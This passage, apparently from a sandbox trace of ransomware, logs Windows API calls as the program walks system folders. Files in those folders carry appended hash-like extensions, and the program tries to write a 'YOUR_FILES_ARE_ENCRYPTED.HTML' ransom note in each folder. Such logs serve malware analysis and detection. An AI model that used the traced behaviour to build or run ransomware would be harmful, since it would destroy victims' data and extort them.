RandomBuffer=0x19e794) returned 1 [0110.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPDetection-02112021-121950.log" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\mpdetection-02112021-121950.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.392] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=324) returned 1 [0110.392] CloseHandle (hObject=0x30c) returned 1 [0110.392] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd04c5003, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd04c5003, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf63d21d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x682, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E", cAlternateFileName="MPLOG-~1.1A4")) returned 1 [0110.392] StrStrIW (lpFirst="MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.392] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E") returned 148 [0110.392] PathFindExtensionW (pszPath="MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E") returned=".1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E" [0110.392] lstrlenW (lpString=".1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E") returned 65 [0110.392] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd0583c11, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd0583c11, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf650304, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D", cAlternateFileName="MPWPPT~1.FF8")) returned 1 [0110.392] StrStrIW (lpFirst="MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.392] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D") returned 173 [0110.392] PathFindExtensionW (pszPath="MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D") returned=".FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D" [0110.392] lstrlenW (lpString=".FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D") returned 65 [0110.392] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34952889, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34952889, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf665826, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875", cAlternateFileName="MPWPPT~1.C97")) returned 1 [0110.392] StrStrIW (lpFirst="MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.393] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875") returned 173 [0110.393] PathFindExtensionW (pszPath="MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875") returned=".C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875" [0110.393] lstrlenW (lpString=".C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875") returned 65 [0110.393] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82987280, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xaf6715f1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F", cAlternateFileName="MPWPPT~1.843")) returned 1 [0110.393] StrStrIW (lpFirst="MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.393] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F") returned 173 [0110.393] PathFindExtensionW (pszPath="MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F") returned=".8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F" [0110.393] lstrlenW (lpString=".8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F") returned 65 [0110.393] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5be6d1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf5be6d1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5c7a6a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.393] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5be6d1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf5be6d1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5c7a6a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.393] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.393] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0110.393] GetProcessHeap () returned 0x600000 [0110.393] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.393] GetProcessHeap () returned 0x600000 [0110.393] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.393] GetProcessHeap () returned 0x600000 [0110.393] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.394] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ca180, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf5ca180, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5ceff1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.394] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ca180, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf5ca180, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5ceff1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.394] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.394] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0110.394] GetProcessHeap () returned 0x600000 [0110.394] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.395] GetProcessHeap () returned 0x600000 [0110.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.395] GetProcessHeap () returned 0x600000 [0110.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.396] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf8572dd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8572dd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1 [0110.396] StrStrIW (lpFirst="Windows Live", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.396] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live") returned 45 [0110.396] GetProcessHeap () returned 0x600000 [0110.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.397] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live" [0110.398] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\*" [0110.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf8572dd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8572dd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.398] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf8572dd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8572dd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.398] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3731a3a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf85c58d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1231, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69", cAlternateFileName="WLIVE4~1.0BA")) returned 1 [0110.398] StrStrIW (lpFirst="WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.398] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69") returned 125 [0110.398] PathFindExtensionW (pszPath="WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69") returned=".0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69" [0110.398] lstrlenW (lpString=".0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69") returned 65 [0110.398] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf694bce, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf694bce, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf699ae7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.398] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf694bce, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf694bce, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf699ae7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.398] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.398] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0110.398] GetProcessHeap () returned 0x600000 [0110.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.399] GetProcessHeap () returned 0x600000 [0110.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.399] GetProcessHeap () returned 0x600000 [0110.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.399] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Windows NT", cAlternateFileName="WINDOW~3")) returned 1 [0110.400] StrStrIW (lpFirst="Windows NT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.400] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned 43 [0110.400] GetProcessHeap () returned 0x600000 [0110.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.400] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" [0110.401] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*" [0110.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8733f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.401] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8733f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.401] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="MSFax", cAlternateFileName="")) returned 1 [0110.401] StrStrIW (lpFirst="MSFax", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.401] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 49 [0110.401] GetProcessHeap () returned 0x600000 [0110.401] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.401] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0110.402] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*" [0110.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf83ffe6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.402] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf83ffe6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="..", cAlternateFileName="")) returned 1 [0110.402] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0110.402] StrStrIW (lpFirst="ActivityLog", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.402] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 61 [0110.402] GetProcessHeap () returned 0x600000 [0110.402] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.403] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0110.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0110.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf6ae685, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.403] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf6ae685, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.403] FindNextFileW (in: hFindFile=0x6265b8, 